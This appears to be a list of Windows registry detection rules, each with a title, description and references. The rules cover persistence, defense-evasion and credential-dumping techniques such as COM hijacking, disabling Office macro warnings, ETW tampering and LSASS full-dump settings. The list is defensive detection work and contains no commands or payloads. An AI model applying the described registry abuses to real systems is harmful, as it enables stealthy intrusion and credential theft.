Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability |
https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw |
Suspicious Application Allowed Through Exploit Guard |
Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings |
https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/ |
Change User Account Associated with the FAX Service |
Detect change of the user account associated with the FAX service to avoid the escalation problem. |
https://twitter.com/dottor_morte/status/1544652325570191361, https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf |
Change the Fax Dll |
Detect possible persistence using Fax DLL load when service restart |
https://twitter.com/dottor_morte/status/1544652325570191361, https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf |
New File Association Using Exefile |
Detects the abuse of the exefile handler in new file association. Used for bypass of security products. |
https://twitter.com/mrd0x/status/1461041276514623491 |
Add Debugger Entry To Hangs Key For Persistence |
Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes |
https://persistence-info.github.io/Data/wer_debugger.html, https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/ |
Persistence Via Hhctrl.ocx |
Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary |
https://persistence-info.github.io/Data/hhctrl.html, https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/ |
Registry Modification to Hidden File Extension |
Hides the file extension through modification of the registry |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd, https://unit42.paloaltonetworks.com/ransomware-families/, https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A |
Displaying Hidden Files Feature Disabled |
Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files.
This technique is abused by several malware families to hide their files from normal users.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry |
Registry Hide Function from User |
Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md |
Hide Schedule Task Via Index Value Tamper |
Detects when the "index" value of a scheduled task is modified from the registry
Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
|
https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments |
Driver Added To Disallowed Images In HVCI - Registry |
Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
|
https://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf, https://x.com/yarden_shafir/status/1822667605175324787 |
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols |
Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
|
https://twitter.com/M_haggis/status/1699056847154725107, https://twitter.com/JAMESWT_MHT/status/1699042827261391247, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries, https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content |
Uncommon Extension In Keyboard Layout IME File Registry Value |
Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
|
https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/ |
Suspicious Path In Keyboard Layout IME File Registry Value |
Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
|
https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/ |
New Root or CA or AuthRoot Certificate to Store |
Detects the addition of new root, CA or AuthRoot certificates to the Windows registry |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store, https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec |
Internet Explorer DisableFirstRunCustomize Enabled |
Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
|
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf, https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/, https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise |
Potential Ransomware Activity Using LegalNotice Message |
Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages |
https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md |
Lolbas OneDriveStandaloneUpdater.exe Proxy Download |
Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
|
https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/ |
Lsass Full Dump Request Via DumpType Registry Settings |
Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS. |
https://github.com/deepinstinct/Lsass-Shtinkering, https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf |
RestrictedAdminMode Registry Value Tampering |
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
|
https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md, https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx |
Blue Mockingbird - Registry |
Attempts to detect system changes made by Blue Mockingbird |
https://redcanary.com/blog/blue-mockingbird-cryptominer/ |
Potential Persistence Via Netsh Helper DLL - Registry |
Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
|
https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll, https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/ |
New Netsh Helper DLL Registered From A Suspicious Location |
Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
|
https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll, https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/ |
NET NGenAssemblyUsageLog Registry Key Tamper |
Detects changes to the NGenAssemblyUsageLog registry key.
.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
|
https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/ |
New Application in AppCompat |
A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint. |
https://github.com/OTRF/detection-hackathon-apt29/issues/1, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md |
Potential Credential Dumping Attempt Using New NetworkProvider - REG |
Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it |
https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade, https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy |
New ODBC Driver Registered |
Detects the registration of a new ODBC driver. |
https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ |
Potentially Suspicious ODBC Driver Registered |
Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location |
https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ |
Microsoft Office Protected View Disabled |
Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/, https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/, https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview |
Trust Access Disable For VBApplications |
Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. |
https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ |
Python Function Execution Security Warning Disabled In Excel - Registry |
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
|
https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327 |
Enable Microsoft Dynamic Data Exchange |
Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. |
https://msrc.microsoft.com/update-guide/vulnerability/ADV170021 |
Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting |
Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53, https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/ |
Outlook Macro Execution Without Warning Setting Enabled |
Detects the modification of Outlook security setting to allow unprompted execution of macros. |
https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 |
Outlook EnableUnsafeClientMailRules Setting Enabled - Registry |
Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros |
https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44 |
Outlook Security Settings Updated - Registry |
Detects changes to the registry values related to outlook security settings |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md, https://learn.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings |
Uncommon Microsoft Office Trusted Location Added |
Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. |
Internal Research, https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 |
Macro Enabled In A Potentially Suspicious Document |
Detects registry changes to Office trust records where the path is located in a potentially suspicious location |
https://twitter.com/inversecos/status/1494174785621819397, Internal Research |
Office Macros Warning Disabled |
Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. |
https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ |
MaxMpxCt Registry Value Changed |
Detects changes to the "MaxMpxCt" registry value.
MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
|
https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps, https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware, https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1, https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/ |
Potential Persistence Using DebugPath |
Detects potential persistence using Appx DebugPath |
https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/, https://github.com/rootm0s/WinPwnage |
Potential Persistence Via AppCompat RegisterAppRestart Layer |
Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
This can be potentially abused as a persistence mechanism.
|
https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md |
Potential Persistence Via App Paths Default Property |
Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence
The entries found under App Paths are used primarily for the following purposes.
First, to map an application's executable file name to that file's fully qualified path.
Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
|
https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/, https://learn.microsoft.com/en-us/windows/win32/shell/app-registration |
Potential Persistence Via AutodialDLL |
Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library |
https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/, https://persistence-info.github.io/Data/autodialdll.html |
Potential Persistence Via CHM Helper DLL |
Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence |
https://persistence-info.github.io/Data/htmlhelpauthor.html, https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/ |
Potential PSFactoryBuffer COM Hijacking |
Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. |
https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine, https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html, https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection, https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html |
COM Object Hijacking Via Modification Of Default System CLSID Default Value |
Detects potential COM object hijacking via modification of default system CLSID. |
https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea), https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/, https://blog.talosintelligence.com/uat-5647-romcom/, https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques, https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea |
Potential Persistence Via Custom Protocol Handler |
Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. |
https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/ |
Potential Persistence Via Event Viewer Events.asp |
Detects potential registry persistence technique using the Event Viewer "Events.asp" technique |
https://twitter.com/nas_bench/status/1626648985824788480, https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks, https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/, https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md |
Potential Persistence Via GlobalFlags |
Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys |
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/, https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ |
Modification of IE Registry Settings |
Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry |
Register New IFiltre For Persistence |
Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.
You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
|
https://persistence-info.github.io/Data/ifilters.html, https://twitter.com/0gtweet/status/1468548924600459267, https://github.com/gtworek/PSBits/tree/master/IFilter, https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308 |
Potential Persistence Via LSA Extensions |
Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
|
https://persistence-info.github.io/Data/lsaaextension.html, https://twitter.com/0gtweet/status/1476286368385019906 |
Potential Persistence Via Mpnotify |
Detects when an attacker register a new SIP provider for persistence and defense evasion |
https://persistence-info.github.io/Data/mpnotify.html, https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek |
Potential Persistence Via Excel Add-in - Registry |
Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started. |
https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md, https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence |
Potential Persistence Via MyComputer Registry Keys |
Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) |
https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/ |
Potential Persistence Via TypedPaths |
Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt |
https://twitter.com/dez_/status/1560101453150257154, https://forensafe.com/blogs/typedpaths.html |
Potential Persistence Via Outlook Today Page |
Detects potential persistence activity via outlook today page.
An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
|
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74, https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change |
Potential Persistence Via Scrobj.dll COM Hijacking |
Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md |
Potential WerFault ReflectDebugger Registry Value Abuse |
Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. |
https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html, https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ |
Potential Persistence Via Visual Studio Tools for Office |
Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. |
https://twitter.com/_vivami/status/1347925307643355138, https://vanmieghem.io/stealth-outlook-persistence/ |
Suspicious Shim Database Patching Activity |
Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/, https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html |
PowerShell Script Execution Policy Enabled |
Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. |
https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts |
Potential Attachment Manager Settings Associations Tamper |
Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) |
https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738, https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 |
Potential Persistence Via Outlook Home Page |
Detects potential persistence activity via outlook home page.
An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
|
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70, https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us, https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change |
Potential Persistence Via DLLPathOverride |
Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process |
https://persistence-info.github.io/Data/naturallanguage6.html, https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/ |
Potential Persistence Via Shim Database In Uncommon Location |
Detects the installation of a new shim database where the file is located in a non-default location |
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/, https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf |
Potential Attachment Manager Settings Attachments Tamper |
Detects tampering with attachment manager settings policies attachments (See reference for more information) |
https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738, https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 |
PowerShell as a Service in Registry |
Detects that a powershell code is written to the registry as a service. |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Potential Persistence Via Shim Database Modification |
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb, https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/ |
Potential PowerShell Execution Policy Tampering |
Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 |
Suspicious Powershell In Registry Run Keys |
Detects potential PowerShell commands or code within registry run keys |
https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry, https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html |
PowerShell Logging Disabled Via Registry Key Tampering |
Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled |
Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG |
Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". |
https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472 |
Usage of Renamed Sysinternals Tools - RegistrySet |
Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution |
Internal Research |
ETW Logging Disabled For rpcrt4.dll |
Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll |
http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html |
Potentially Suspicious Command Executed Via Run Dialog Box - Registry |
Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
|
https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf, https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71, https://www.forensafe.com/blogs/runmrukey.html, https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/ |
ScreenSaver Registry Key Set |
Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl |
https://twitter.com/VakninHai/status/1517027824984547329, https://twitter.com/pabraeken/status/998627081360695297, https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files |
Potential SentinelOne Shell Context Menu Scan Command Tampering |
Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne. |
https://mrd0x.com/sentinelone-persistence-via-menu-context/ |
ETW Logging Disabled For SCM |
Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) |
http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html |
ServiceDll Hijack |
Detects changes to the "ServiceDLL" value related to a service in the registry.
This is often used as a method of persistence.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time, https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ |
Registry Explorer Policy Modification |
Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md |
Persistence Via New SIP Provider |
Detects when an attacker register a new SIP provider for persistence and defense evasion |
https://persistence-info.github.io/Data/codesigning.html, https://github.com/gtworek/PSBits/tree/master/SIP, https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf |
Tamper With Sophos AV Registry Keys |
Detects tamper attempts to sophos av functionality via registry key modification |
https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ |
Hiding User Account Via SpecialAccounts Registry Key |
Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. |
https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/, https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md |
Activate Suppression of Windows Security Center Notifications |
Detect set Notification_Suppress to 1 to disable the Windows security center notification |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md |
Suspicious Environment Variable Has Been Registered |
Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings |
https://infosec.exchange/@sbousseaden/109542254124022664 |
Suspicious Keyboard Layout Load |
Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only |
https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index, https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files |
Potential PendingFileRenameOperations Tampering |
Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
|
